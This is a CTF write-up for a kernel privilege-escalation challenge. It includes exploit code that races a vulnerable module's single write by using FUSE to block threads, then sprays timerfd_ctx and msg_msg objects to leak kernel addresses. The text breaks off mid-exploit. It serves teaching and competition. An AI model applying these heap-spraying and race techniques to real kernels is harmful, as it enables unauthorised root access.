Kernels and Cats

TLDR

Meowcrosoft Word is a kernel pwn challenge where only one allocate, one write, and one free are supposed to be possible. However, by exploiting a race condition and blocking/unblocking threads with FUSE (userfaultfd is disabled), privilege escalation from user to root is possible. timerfd_ctx is used to leak the kernel base, msg_msg is used to leak the kernel heap, and pipe_buffer is used to control RIP and start off a ROP chain to call prepare_kernel_cred() and commit_creds() to get root.

The Story Behind Meowcrosoft Word
Module Functionality
The FUSE Filesystem
Exploitation Overview
Setup
Triggering the Race Condition and Blocking
Leaking Kernel Base
Leaking the Kernel Heap with msg_msg
Getting a Double Free
ROP Time!!!

The Story Behind Meowcrosoft Word

Meowcrosoft Word was inspired by HITCON 2022’s Fourchain Kernel (a really great writeup by Organizers can be found here: https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel ), as well as my time in STAR Labs, where I had to deal with FUSE. Having had to do multiple writes by synchronizing threads and blocking/unblocking them, I was like “why not give people one single write, and force them to do it as well >:3”. However, kernel pwn was already very cursed and I wanted people to actually do it, so I had to give it a cute name, and hence Meowcrosoft Word came into existence.

However, because I was busy with school and lab and OSED and stuff, and then I had to fly back home for the holidays, I only really started working on the challenge right before the CTF (sorry violenttestpen!). This led to a lot of stupid funny crap happening during the competition.

On the first day of the CTF, people were saying that they wanted more pwn, so I tried to coerce (read: convince nicely) people to do Meowcrosoft Word. And so, within 1 hour and 20 minutes of the CTF starting, the challenge was blooded.

Flag in root image

(Thank you GenericUser for being an Upright and Honest Citizen TM)

Basically, what happened was that in my mad rush to submit the challenge, I told infra to run the root.img containing the flag on the challenge server, AND distribute the SAME root.img to the participants. So all you needed to do to get the flag was to extract the image and cat the flag 💀💀💀

The challenge went down for a while, but the disaster continues. On the same day that I submitted the challenge to infra, I managed to blow up my Kali VM (where I was developing the challenge and exploit on) by using too much hard disk space, resulting in me having to revert the VM and lose a lot of my work. Fortunately most of the challenge files were on GitHub, but somehow extracting root.img into a filesystem and then recreating the image file caused some explosions, so I had to completely remake the root.img via debootstrap, installing FUSE, etc etc. This took some time, but I managed to change the flag, rebuild root.img (for the server) and dist.img (for the players), and submit them to infra. …And then infra exploded again.

A few tickets were opened to tell me that the kernel challenge remote did not work, and I got a ticket from IceCreamMan telling me that because I forgot to add -monitor /dev/null to my qemu run command, it was possible to access the QEMU console 💀💀💀. We had to take the challenge down again, but hopefully, since no one had a working exploit on local yet, it was not too disruptive. I also realized that every connection ran a QEMU command pointing to the same image, which would not work either. Some modifications were then made to copy a new root image for each new connection and use that for the QEMU command, and I submitted the new Dockerfiles and such for infra to rebuild. However, I realized that I should use a cron job to clean up all the unused images every 5 minutes to prevent the container from exploding, so I had to make yet another change and infra had to build the same stupid container for the third time in the same day. So for a while, everything was fine and dandy, and someone blooded the challenge!

Then, at 2.30 am the next day, I got a ticket saying that the server hosting the kernel challenge had gone down :"( I tried to SSH into the server, but I think it exploded pretty hard, so I sent a message to infra to restart it and went to sleep. Thankfully all was good the next morning and for the rest of the CTF :D (Note to self: Do not write challenges in a rush :"3)

Module Functionality

The main functionality of the module was in ioctl_module. The module takes a structure as such via ioctl:

struct req { 
    uint64_t size;
    uint64_t addr;
};

And can perform the following actions: create, write, read, and free.

There are 3 global variables which are all initially set to 0: create_done, write_done, and free_done. When an action has been completed, the corresponding variable would be set to 1. This would mean that without doing anything weird, you would only get 1 create, 1 write, and 1 free. Just like a crappy trial version of Microsoft Word (where you can’t actually do anything)!

    lVar2 = _copy_from_user(&size,param_3,0x10);
    if ((lVar2 != 0) || (_printk(&DAT_001003a2), (char *)0x100 < size)) goto LAB_001001d2;

The module first checks that the size specified in the req struct is at most 0x100; if the size is greater than 0x100, any action called will fail and immediately jump to return.

Create a document: 0xc010ca00

    if (param_2 == 0xc010ca00) { // Create a new document
        if (create_done == 0) {
            create_done = 1;
            doc = (char **)kmalloc_trace(_DAT_00101088,0xdc0,0x20); 
            *doc = meow_str;
            doc[2] = size;
            doc[1] = expiry;
            data_ptr = (char *)__kmalloc(size,0xdc0);
            doc[3] = data_ptr; // Pointer to allocated region
            _printk(&DAT_001003d7); // "Create done"
        }
        else {
            _printk(&DAT_00100430); // "Unable to create any new documents"
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
        }
        goto LAB_001001d2;
    }

When create is called, a new document (tbh, a fancy way of saying note lol) is only created if create_done is 0. The doc object and its data region are then allocated with the GFP_KERNEL flag. struct document can be seen below:

struct document { // document object
    char * meow_str; // "Meowcrosoft Office Products TM"
    char * expiry; // "Expires now!!"
    uint64_t size; // Cannot be larger than 0x100
    uint64_t data_ptr; // Pointer to user information
};

I had to include the first two pointers to two useless strings in struct document as when the struct is freed later on, an encrypted pointer is written to doc[1] (due to CONFIG_SLAB_FREELIST_HARDENED, which obfuscates freelist pointers). For the challenge to work, data_ptr needs to remain intact and cannot be overwritten by anything; if an encrypted pointer was written there it would destroy the value.

Write to a document: 0xc010ca01

    if (doc != (char **)0x0) {
        if (write_done == 0) {
            if (doc[2] < size) {
                _printk(&DAT_001003e6); // "Prevent BOF" 
            }
            else {
                if (size < (char *)0x7d1) {
                    _copy_from_user(local_7e8,local_7f0);
                }
                else {
                    __copy_overflow(2000,size);
                }
                memcpy(doc[3],local_7e8,(size_t)size);
                write_done = 1;
                _printk(&DAT_001003f5); // "Write done"
            }
        }
        else {
            _printk(&DAT_001004b8); // "Unable to edit any more documents."
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
        }
        goto LAB_001001d2;
    }

The write function first checks if write_done is equal to 0, and if it is not, the function immediately goes to return, hence allowing only one write normally. It then checks that the requested size is not larger than the size in the document object, and if that holds, the user data is copied into a kernel stack buffer with copy_from_user and then into the region pointed to by data_ptr in the document struct. Finally, once memcpy has been completed, write_done is set to 1. Notice that write_done is only set to 1 after copy_from_user is called; this becomes important later on.

Read from a document: 0xc010ca02

    if (param_2 == 0xc010ca02) {
        if ((doc != (char **)0x0) && (size <= doc[2])) {
            memcpy(local_7e8,doc[3],(size_t)size);
            if (data_ptr < (char *)0x7d1) {
                _copy_to_user(local_7f0,local_7e8,data_ptr);
            }
            else {
                __copy_overflow(2000,data_ptr);
            }
            _printk(&DAT_00100403); // "Read done"
            goto LAB_001001d2;
        }
    }

The read function first ensures that the doc object exists (to prevent a null pointer dereference), and that the size to read is no larger than the size stored in the document struct. The number of bytes specified by size is then copied to a buffer, and copy_to_user copies the data to userspace. Unlike create, write and free, an unlimited number of reads can be performed.

Delete a document: 0xc010ca03

    else {
        if (param_2 != 0xc010ca03) goto LAB_001001d2;
        if (free_done != 0) {
            _printk(&DAT_001004e0); // "Unable to delete any more documents."
            _printk(&DAT_00100458); // "Please buy a Meowcrosoft Word license."
            goto LAB_001001d2;
        }
        if (doc != (char **)0x0) {
            free_done = 1;
            kfree(doc[3]);
            _printk(&DAT_00100410); // "Free done"
            goto LAB_001001d2;
        }
    }

The free function checks that free_done is equal to 0, and that the doc object exists, before setting free_done to 1 and performing a free on the data_ptr of the doc object. However, data_ptr is not zeroed out, resulting in a use-after-free.

There is also a race condition vulnerability – as there are no locks involved, it is possible to write to a doc that has been freed and reallocated as a different object, allowing us to corrupt certain fields that would aid in exploitation.
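To make the window concrete, here is a small userspace model of the write path (not the module itself). All names in it are made up for illustration: a blocking pipe read stands in for copy_from_user stalling on a page, and a semaphore only exists so the demo is deterministic. Both writers pass the write_done check before either of them sets the flag, so the "single" write happens twice.

```c
#include <pthread.h>
#include <semaphore.h>
#include <stdatomic.h>
#include <unistd.h>

/* Userspace model only: none of these names exist in the challenge module. */
static atomic_int write_done;      /* mirrors the module's one-shot flag     */
static atomic_int writes_finished; /* how many writes actually completed     */
static int gate[2];                /* pipe standing in for the stalled copy  */
static sem_t passed_check;         /* posted once a writer is past the check */

static void *model_write(void *arg) {
    char token;
    (void)arg;
    if (atomic_load(&write_done) != 0)
        return NULL;                       /* "Unable to edit any more documents." */
    sem_post(&passed_check);
    /* Stand-in for copy_from_user() blocking until the page is available. */
    if (read(gate[0], &token, 1) != 1)
        return NULL;
    atomic_fetch_add(&writes_finished, 1); /* stand-in for the memcpy    */
    atomic_store(&write_done, 1);          /* the flag is only set here  */
    return NULL;
}

/* Starts two writers, waits until both are past the check, then releases
 * them. Returns the number of writes that completed, or -1 on setup error. */
int run_race_model(void) {
    pthread_t t[2];
    atomic_store(&write_done, 0);
    atomic_store(&writes_finished, 0);
    if (pipe(gate) != 0 || sem_init(&passed_check, 0, 0) != 0)
        return -1;
    for (int i = 0; i < 2; i++)
        if (pthread_create(&t[i], NULL, model_write, NULL) != 0)
            return -1;
    for (int i = 0; i < 2; i++)
        sem_wait(&passed_check);
    if (write(gate[1], "AB", 2) != 2)      /* one byte per blocked writer */
        return -1;
    for (int i = 0; i < 2; i++)
        pthread_join(t[i], NULL);
    close(gate[0]);
    close(gate[1]);
    sem_destroy(&passed_check);
    return atomic_load(&writes_finished);
}
```

In the real exploit the two writers are released at different times, which is what lets each write hit a different object occupying the same freed slot.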

Userfaultfd is commonly used to block on copy_from_user, allowing for reliable race condition exploitation. However, in this challenge, as CONFIG_USERFAULTFD is not set, it would not be possible to use userfaultfd as the syscall is not implemented. Thankfully, CONFIG_FUSE_FS has been set, and fuse has been installed in root.img, allowing for control of the race condition via the FUSE filesystem.

The FUSE Filesystem

FUSE (Filesystem in UserSpacE) is an interface that allows non-privileged users to create their own filesystems without modifying kernel code. It consists of the kernel module, fuse.ko, the userspace library, libfuse, and the mount utility, fusermount. By setting up a FUSE filesystem, you can define custom functions to perform operations such as reading and writing to files. In this case, the read operation becomes particularly important as being able to control FUSE file reads will give us the ability to block and release threads whenever we want.

To define file operations and set up a FUSE filesystem, the following code can be used:

static struct fuse_operations operations = {
    .getattr	= do_getattr,
    .readdir	= do_readdir,
    .read	= do_read,
};

void fuse_setup_fn(void) {
    struct fuse_args args = FUSE_ARGS_INIT(0, NULL);
    struct fuse_chan *chan;
    struct fuse *fuse;
    
    if (mkdir("/tmp/fuse_dir", 0777)) {
        perror("[!] mkdir FUSE failed");
        exit(-1);
    }
    
    if (!(chan = fuse_mount("/tmp/fuse_dir", &args))) {
        perror("[!] fuse_mount failed");
        exit(-1);
    }
                                                                                          
    if (!(fuse = fuse_new(chan, &args, &operations, sizeof(operations), NULL))) {
        fuse_unmount("/tmp/fuse_dir", chan);
        perror("[!] Setup failed");
        exit(-1);
    }
    
    fuse_set_signal_handlers(fuse_get_session(fuse));
    fuse_loop_mt(fuse);
}

And in main, to make the FUSE directory and to start the filesystem:

    // Make FUSE directory
    printf("[+] Making FUSE directory /tmp/fuse_dir\n");
    if (mkdir("/tmp/fuse_dir", 0777)) {
        perror("[!] mkdir FUSE failed");
        exit(-1);
    }
    
    // Start the FUSE filesystem
    printf("[+] Starting FUSE filesystem\n");
    if (!fork()) {
        dup2(1, 666);
        fuse_main(argc, argv, &operations, NULL);
    }
    sleep(1);

You can see that filesystem operations such as getattr, readdir and read can be set to user defined functions. For instance, if I set the read operation to do_read as follows:

static int do_read(const char *path, char *buffer, size_t size, off_t offset, struct fuse_file_info *fi) {
	dprintf(666, "--> Trying to read %s, %lld, %zu\n", path, (long long)offset, size);
	uint64_t write1[0x100];
	char *selectedText = NULL;

	if (strcmp(path, "/write1") == 0) {
		// File contents: eight 'B' bytes followed by zeroes
		memset(write1, 0, sizeof(write1));
		write1[0] = 0x4242424242424242;
		selectedText = (char *)write1;
	}
	else {
		return -1;
	}
	// Hand the requested window of the file back to the kernel
	memcpy(buffer, selectedText + offset, size);
	return strlen(selectedText) - offset;
}

If the FUSE filesystem is mounted at /tmp/fuse_dir, and you try to read from /tmp/fuse_dir/write1, you will receive “BBBBBBBB”. Through defining a custom read operation, we are not only able to control what can be read from the FUSE file, but also what happens when the file is read (e.g. blocking).

Exploitation Overview

So we know that it is possible to trigger a race condition on the kernel module, and that there is a use-after-free in the delete function, where the pointer to the data object in struct document is not zeroed out.

So here is what we are going to do:

Meowcrosoft Word Exploit Flow

Create a new document of size 0x100. The data section will be allocated in kmalloc-256.
Create a new thread “write2_thread”.
Write to the document where the buffer containing the data to be written is set to the mmapped address of FUSE file /write2. This will cause the main thread to block, and execution will be passed to write2_thread.
Create a new thread “write1_thread”.
Write to the document where the buffer containing the data to be written is set to the mmapped address of FUSE file /write1. This will cause write2_thread to block, and execution will be passed to write1_thread.
Trigger the race condition by deleting the document (which will free the data section). At this point, there are pending writes to an object that has already been freed.
While the write is still blocked, spray timerfd_ctx and arm the timers in order to leak a kernel address that can be used to calculate the kernel base.
Free the timerfd_ctx objects.
Spray msg_msg to cross cache and occupy the freed object.
Unblock write1 to overwrite msg_msg size to a large value (0x960 in this case). At this point, write2 is still blocked.
Read from the corrupted msg_msg object to leak a kmalloc-1024 address, as well as a next/prev pointer.
Unblock write2 and overwrite next/prev so that the next/prev of 2 msg_msg objects of size 256 are pointing to the same secondary msg_msg of size 1024.
Free the secondary msg_msg (that has 2 next pointers pointing to it) once.
Spray sk_buff objects.
Free the secondary msg_msg again to obtain a double free.
Spray and free pipe_buffer objects over the freed object of size 1024.
Construct a fake pipe_buffer object over the freed region and spray. The fake object will have release in pipe_buf_operations pointing to the start of the ROP chain.
Release the pipe buffer objects by closing the pipes to trigger off the ROP chain.
ROP it like it’s hot to get your shell!

Setup

We are first going to do some setup before our exploit.

We want to limit all actions to the same CPU, so we will make a call to sched_setaffinity.

    cpu_set_t cpu;
    CPU_ZERO(&cpu);
    CPU_SET(0, &cpu);
    if (sched_setaffinity(0, sizeof(cpu_set_t), &cpu)) {
        perror("sched_setaffinity");
        exit(-1);
    }

We are then going to set up some pipes that would be used for blocking in the FUSE filesystem, as well as to synchronize different parts of our exploits so that the actions take place in the exact order that we want them to.

    // Setting up FUSE pipes to sync exploit
    printf("[+] Setting up pipes\n");
    pipe(fuse_pipe1);
    pipe(fuse_1_2_sync);
    pipe(fuse_pipe2);
    pipe(fuse_write2_data);

Then, we are going to start the FUSE filesystem. Note that when the FUSE filesystem is started, all of the contents in the FUSE files and such would be finalized in a sense. For example, when you read from a FUSE file, the contents that you get would be the contents of the file when the FUSE filesystem is initialized. However, there is a way to “modify” the contents of a FUSE file by reading and writing to pipes; I will talk about this later on.

    // Start the FUSE filesystem
    printf("[+] Starting FUSE filesystem\n");
    if (!fork()) {
        dup2(1, 666);
        fuse_main(argc, argv, &operations, NULL);
    }
    sleep(1);

After starting the FUSE filesystem, we need to mmap the files “/write1” and “/write2” as we would need the addresses later on in the exploit.

    // Open and mmap write1 file on FUSE
    printf("[+] Opening FUSE file write1\n");
    int fuse_fd1; 
    if((fuse_fd1 = open("/tmp/fuse_dir/write1", O_RDWR)) < 0) {
        perror("[!] Failed to open FUSE file");
        exit(-1);
    }
    // mmap the /write1 file
    addr_write1 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE, fuse_fd1, 0);
    if (addr_write1 == MAP_FAILED) {
        perror("[!] mmap failed");
        exit(-1);
    }
    // Open and mmap write2 file on FUSE
    printf("[+] Opening FUSE file write2\n");
    int fuse_fd2; 
    if((fuse_fd2 = open("/tmp/fuse_dir/write2", O_RDWR)) < 0) {
        perror("[!] Failed to open FUSE file");
        exit(-1);
    }
    // mmap the /write2 file
    addr_write2 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE, fuse_fd2, 0);
    if (addr_write2 == MAP_FAILED) {
        perror("[!] mmap failed");
        exit(-1);
    }

We also need to set up sockets, pipe buffer structs, and msg_msg queues that would be used later on in the exploit.

    // Set up sockets
    printf("[+] Setting up sockets\n");
    for (int i = 0; i < NUM_SOCKETS; i++) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
            perror("[!] Socket pair");
            exit(-1);
        }
    }
    
    // Set up message queues
    printf("[+] Setting up msg queues\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
            perror("[!] msgget failed");
            exit(-1);
        }
    }
    
    // Set up pipebuf stuff
    struct pipe_buf_operations *ops;
    struct pipe_buffer *pbuf;

Finally, we need to open the Meowcrosoft Word device.

    // Open Meowcrosoft word device
    printf("[+] Opening Meowcrosoft Word device\n");
    if ((fd = open("/dev/meowcrosoft_word", O_RDONLY)) < 0) {
        perror("[!] Failed to open miscdevice");
        exit(-1);
    }

Triggering the Race Condition and Blocking

Now comes the fun part. We are going to trigger the race condition, and then block twice – first on /write2, which will call write2_thread, which will then block on /write1, which will then call write1_thread.

We first create the doc object by doing something like create_doc(buf, 256);. create_doc is just a helper function that I have created to handle all the IOCTL calls to make life easier. This will allocate and create a doc object. A data region of size 256 will also be allocated in kmalloc-256.
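For reference, this is roughly what such helpers could look like. It is a sketch and not the exact helper code from the exploit: the doc_* names and the explicit fd parameter are made up here, and the 0xca "type" byte is only inferred from the command values, which decode as _IOWR(0xca, n, struct req) on x86-64.

```c
#include <stdint.h>
#include <sys/ioctl.h>

/* Request layout taken from the module description: 0x10 bytes in total. */
struct req {
    uint64_t size;
    uint64_t addr;
};

/* Command numbers from the decompilation, rebuilt with the ioctl macros. */
#define MEOW_CREATE _IOWR(0xca, 0, struct req) /* 0xc010ca00 */
#define MEOW_WRITE  _IOWR(0xca, 1, struct req) /* 0xc010ca01 */
#define MEOW_READ   _IOWR(0xca, 2, struct req) /* 0xc010ca02 */
#define MEOW_FREE   _IOWR(0xca, 3, struct req) /* 0xc010ca03 */

/* Hypothetical helper: fills in a request and sends it to the device. */
static int meow_ioctl(int fd, unsigned long cmd, void *addr, uint64_t size) {
    struct req r = { .size = size, .addr = (uint64_t)(uintptr_t)addr };
    return ioctl(fd, cmd, &r);
}

int doc_create(int fd, void *addr, uint64_t size) {
    return meow_ioctl(fd, MEOW_CREATE, addr, size);
}

int doc_write(int fd, void *addr, uint64_t size) {
    return meow_ioctl(fd, MEOW_WRITE, addr, size);
}

int doc_read(int fd, void *addr, uint64_t size) {
    return meow_ioctl(fd, MEOW_READ, addr, size);
}

int doc_free(int fd, void *addr, uint64_t size) {
    return meow_ioctl(fd, MEOW_FREE, addr, size);
}
```

The size field is checked against 0x100 for every command, so it has to be sane even for free.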

Once that is done, we will create a new thread for the function write2_thread. We will then call a write on the address returned from mmapping the /write2 file, and cause a block.

    // Create thread for write2
    printf("[+] Creating thread for write2\n");
    pthread_t thr;
    int b = pthread_create(&thr, NULL, write2_thread, NULL); 
    if(b != 0) {
        perror("pthread_create");
        exit(-1);
    }
    
    write_doc(addr_write2, 0x18); // Trigger and block 
    sleep(1);

Now the question is: why does the main thread block when we call write using addr_write2 (/write2)? When write_doc is called, write_done is still 0, so that check passes. A doc object exists, so that check also passes. The number of bytes that we are trying to write is no larger than the size of the data region (which is stored in the document object), so that check passes too. The module then calls copy_from_user to copy from the specified userspace address (in this case addr_write2, where /write2 has been mmapped) into a buffer in kernel space. That page has not been touched yet, so the access page faults and the kernel has to ask our FUSE filesystem for the file contents, which runs our read handler. Let’s take a look at the FUSE read handler to see what happens when a read on /write2 is triggered.

static int do_read(const char *path, char *buffer, size_t size, off_t offset, struct fuse_file_info *fi) {
	dprintf(666, "--> Trying to read %s, %lld, %zu\n", path, (long long)offset, size);
	char lolText[0x200];
	uint64_t write1[0x100];
    char *selectedText = NULL;
	char signal;
	
	if (strcmp(path, "/write1") == 0) {
	    memset(write1, 0, sizeof(write1));
	    write1[0] = 0x4242424242424242;
	    write1[1] = 0x4242424242424242;
	    write1[2] = 0x4343434343434343; 
	    write1[3] = 0x960;
		selectedText = (char *)write1;
		dprintf(666, "[+] Blocking FUSE read thread\n");
		read(fuse_pipe1[0], &signal, 1);
		dprintf(666, "[+] Unblocked FUSE read thread\n");
    	}
	else if (strcmp(path, "/write2") == 0) {
        	dprintf(666, "[+] Blocking FUSE read thread\n");
        	memset(lolText, 0, sizeof(lolText));
        	read(fuse_pipe2[0], &signal, 1);
        	read(fuse_write2_data[0], &lolText, 0x18);
        	selectedText = lolText;
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[0]);
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[1]);
        	dprintf(666, "[*] From FUSE: %llx\n", ((uint64_t *) selectedText)[2]);
		dprintf(666, "[+] Unblocked FUSE read thread\n");
    	}
	else {
		return -1;
    	}
	memcpy(buffer, selectedText + offset, size);
	return 0x100 - offset;
}

When a read from the FUSE file /write2 occurs, read(fuse_pipe2[0], &signal, 1); is triggered. However, remember that we have only just created the pipes when we set up the exploit, so there is nothing to read from the pipe yet. The FUSE handler therefore blocks on read until something is written to the pipe, and the main thread, which is waiting inside copy_from_user for that page, stays blocked along with it. This will cause a context switch to the newly created thread running the function write2_thread.

Inside write2_thread, we do the same block on write again, but this time, we block on read from /write1. We call write but use the address that has been mmapped to the FUSE file /write1.

    // Create thread for write1
    printf("[+] Creating thread for write1\n");
    pthread_t thr;
    int b = pthread_create(&thr, NULL, write1_thread, NULL); 
    if(b != 0) {
        perror("pthread_create");
        exit(-1);
    }
    
    write_doc(addr_write1, 0x20); // Trigger and block 
    sleep(1);

As before, and as seen in the code for FUSE above, when we try to read from /write1, read(fuse_pipe1[0], &signal, 1); is called, causing write2_thread to block, and the CPU executes write1_thread instead.

Leaking Kernel Base

To leak the kernel base, we can spray the timerfd_ctx object. Struct timerfd_ctx and other relevant structs are shown below:

struct timerfd_ctx {
	union {
		struct hrtimer tmr;
		struct alarm alarm;
	} t;
	ktime_t tintv;
	ktime_t moffs;
	wait_queue_head_t wqh;
	u64 ticks;
	int clockid;
	short unsigned expired;
	short unsigned settime_flags;	
	struct rcu_head rcu;
	struct list_head clist;
	spinlock_t cancel_lock;
	bool might_cancel;
};

struct hrtimer {
	struct timerqueue_node		node;
	ktime_t				_softexpires;
	enum hrtimer_restart		(*function)(struct hrtimer *);
	struct hrtimer_clock_base	*base;
	u8				state;
	u8				is_rel;
	u8				is_soft;
	u8				is_hard;
};

struct timerqueue_node {
	struct rb_node node;
	ktime_t expires;
};

struct rb_node {
	unsigned long  __rb_parent_color;
	struct rb_node *rb_right;
	struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

From all the structs, we can see that function, a function pointer that returns enum hrtimer_restart, sits at offset 0x28 in struct timerfd_ctx (0x18 bytes of rb_node, 8 bytes of expires, and 8 bytes of _softexpires come before it). If we arm the timers, function will be populated with a kernel text pointer, which we can leak and use to calculate the kernel base.
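The 0x28 can be double-checked in userspace by rebuilding the structs with stand-in types and asking the compiler. This is only a sketch for x86-64: ktime_t is modeled as a 64-bit integer, the clock base pointer as void *, and leaked_function_ptr is a made-up helper that pulls the value out of a buffer filled by the read ioctl.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userspace stand-ins with the same field order as the kernel structs. */
typedef int64_t ktime_t;
enum hrtimer_restart { HRTIMER_NORESTART, HRTIMER_RESTART };

struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};

struct timerqueue_node {
    struct rb_node node;
    ktime_t expires;
};

struct hrtimer {
    struct timerqueue_node node;
    ktime_t _softexpires;
    enum hrtimer_restart (*function)(struct hrtimer *);
    void *base; /* struct hrtimer_clock_base * in the kernel */
    uint8_t state, is_rel, is_soft, is_hard;
};

/* The hrtimer is the first member of timerfd_ctx, so this is also the
 * offset inside the sprayed object. */
#define TIMER_FUNCTION_OFFSET offsetof(struct hrtimer, function)

/* Hypothetical helper: extract the candidate pointer from the data that
 * the read ioctl copied out of the (now reallocated) document region. */
uint64_t leaked_function_ptr(const unsigned char *doc_data) {
    uint64_t ptr;
    memcpy(&ptr, doc_data + TIMER_FUNCTION_OFFSET, sizeof(ptr));
    return ptr;
}
```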

To spray and arm the timers, we can do the following:

    // Spray timerfd objects
    printf("[+] Spraying timerfd\n");
    for (int i = 0; i < NUM_TIMERFDS; i++) {
        timerfds[i] = timerfd_create(CLOCK_REALTIME, 0); 
        timerValue.it_value.tv_sec = 1;
        timerValue.it_value.tv_nsec = 0;
        timerValue.it_interval.tv_sec = 1;
        timerValue.it_interval.tv_nsec = 0;
        timerfd_settime(timerfds[i],  0, &timerValue, NULL); 
    }   
    sleep(1);

We can then simply read the doc to leak a kernel pointer.
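Turning the leaked pointer into the kernel base is just a subtraction, but a couple of sanity checks save a lot of debugging when the spray misses. The sketch below assumes a typical x86-64 KASLR layout (kernel image somewhere in 0xffffffff80000000 to 0xffffffffc0000000, base aligned to 2 MiB); the symbol offset has to come from the challenge's own vmlinux and is passed in as a parameter, and the function names are made up.

```c
#include <stdint.h>

/* Assumed x86-64 layout; adjust if the target kernel is configured differently. */
#define KTEXT_START 0xffffffff80000000ULL
#define KTEXT_END   0xffffffffc0000000ULL
#define KASLR_ALIGN 0x200000ULL

/* Does the value fall inside the range where the kernel image can live? */
int looks_like_kernel_text(uint64_t p) {
    return p >= KTEXT_START && p < KTEXT_END;
}

/* Returns the kernel base, or 0 if the leak does not look right.
 * sym_offset is the leaked function's offset from the base in vmlinux. */
uint64_t kernel_base_from_leak(uint64_t leak, uint64_t sym_offset) {
    uint64_t base;
    if (!looks_like_kernel_text(leak))
        return 0;
    base = leak - sym_offset;
    if (base < KTEXT_START || (base & (KASLR_ALIGN - 1)) != 0)
        return 0;
    return base;
}
```

A return value of 0 usually means the document region was reclaimed by something other than a timerfd_ctx, in which case it is easier to rerun than to continue.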

Leaking the Kernel Heap with msg_msg

We now want to get a kernel heap leak in a kmalloc-cg-1024 cache, as that is where the pipe_buffer objects that we will later use in exploitation would be allocated (or at least this is what I intended, will explain more later). In order to do that, we are going to make use of struct msg_msg, which you can see below:

struct msg_msg {
	struct list_head m_list; // contains 2 pointers, next and prev
	long m_type;             // message type
	size_t m_ts;		     // message data size
	struct msg_msgseg *next; // msg_msgseg contains more data from the same msg_msg if the size is very big
	void *security;          // selinux security pointer
	/* the actual message follows immediately */
};

struct msg_msg is an elastic object: the header is 0x30 bytes and the message data follows it, so the object can be made to land in most kmalloc caches. The object can be allocated via the msgsnd() syscall and freed via the msgrcv() syscall, and was originally intended for IPC via System V message queues. If the kernel was compiled with CONFIG_CHECKPOINT_RESTORE (which it was in this challenge), msgrcv() with the MSG_COPY flag can also be used to leak data without freeing the msg_msg object.

The struct list_head m_list contains the next and previous pointers to messages in the same queue (and messages do not have to be the same size). As such, we can use the next pointer in struct list_head to leak a kmalloc-cg-1024 address.
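Since the 0x30-byte header is part of the allocation, the msgsz passed to msgsnd() has to be the target slab size minus the header. A quick sketch of that arithmetic, with a stand-in struct for the header (x86-64 sizes assumed, names made up for illustration):

```c
#include <stddef.h>

/* Stand-in for the kernel's struct msg_msg header on x86-64. */
struct msg_msg_hdr {
    void *m_list_next;
    void *m_list_prev;
    long m_type;
    size_t m_ts;
    void *next;
    void *security;
};

/* Largest msgsz whose msg_msg (header + data) still fits the given slab. */
size_t msgsz_for_slab(size_t slab_size) {
    return slab_size - sizeof(struct msg_msg_hdr);
}

/* Userspace buffers sized so that the kernel objects fill their slabs. */
struct primary_msg {
    long mtype;
    char mtext[0x100 - sizeof(struct msg_msg_hdr)];
};

struct secondary_msg {
    long mtype;
    char mtext[0x400 - sizeof(struct msg_msg_hdr)];
};
```

With buffers like these, sizeof(buffer) - sizeof(long) is exactly the msgsz to pass, which matches how the spray loops further down compute it.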

This is when the cross cache attack comes in. Remember that the document data object was allocated with GFP_KERNEL, which means that it would end up in kmalloc-256 (a normal kmalloc cache), but the msg_msg object is allocated with GFP_KERNEL_ACCOUNT, which means that it would end up in a kmalloc-cg-x cache depending on its size. The general idea of the cross cache attack is to mess with the buddy allocator so that instead of being allocated into a cg cache, the msg_msg object will be allocated into the normal cache and reclaim the freed space after the timerfd_ctx object occupying the freed document data region is freed. You can check out https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/#crossing-the-cache-boundary for more information about the cross cache attack, but I found that spraying a large number of objects in the normal kmalloc cache, freeing all of them, and spraying a large number of objects you want to occupy the victim object with works perfectly well.

We will first free all the timerfd_ctx objects in preparation for the msg_msg spray.

    // Free timerfd objects
    printf("[+] Freeing timerfd spray\n");
    for (int i = 0; i < NUM_TIMERFDS; i++) {
        close(timerfds[i]);
    }

We will then spray primary msg_msg objects of size 256 (which is the same size as the document data object), in the hopes that one of them will reclaim the freed space where the document data object was. In each of the message queues, we will then spray a secondary message of size 1024, so that the next pointer of the msg_msg objects will point to a kmalloc-cg-1024 address.

    // Spray msg_msg to cross cache
    dprintf(667, "[+] Spraying primary msg_msg objects\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&message, 0, sizeof(message));
        *(long *)&message.mtype = 0x41;
        *(int *)&message.mtext[0] = MSG_TAG;
        *(int *)&message.mtext[4] = i;
        if (msgsnd(msqid[i], &message, sizeof(message) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");
            exit(-1);
        }
    }
    sleep(1);
    
    dprintf(667, "[+] Spraying secondary msg_msg objects\n");
    for (int i = 0; i < NUM_MSQIDS; i++) {
        memset(&msg_secondary, 0, sizeof(msg_secondary));
        *(long *)&msg_secondary.mtype = 0x42;
        *(int *)&msg_secondary.mtext[0] = MSG_TAG;
        *(int *)&msg_secondary.mtext[4] = i;
        if (msgsnd(msqid[i], &msg_secondary, sizeof(msg_secondary) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");
            exit(-1);
        }
    }
    sleep(1);

This is the moment when we unblock /write1 by writing to the pipe via write(fuse_pipe1[1], "A", 1);. Once there is a byte in the pipe, the blocked read in the FUSE handler returns, and the first write goes through. If we look at the contents of the first write:

	    write1[0] = 0x4242424242424242;
	    write1[1] = 0x4242424242424242;
	    write1[2] = 0x4343434343434343; 
	    write1[3] = 0x960;

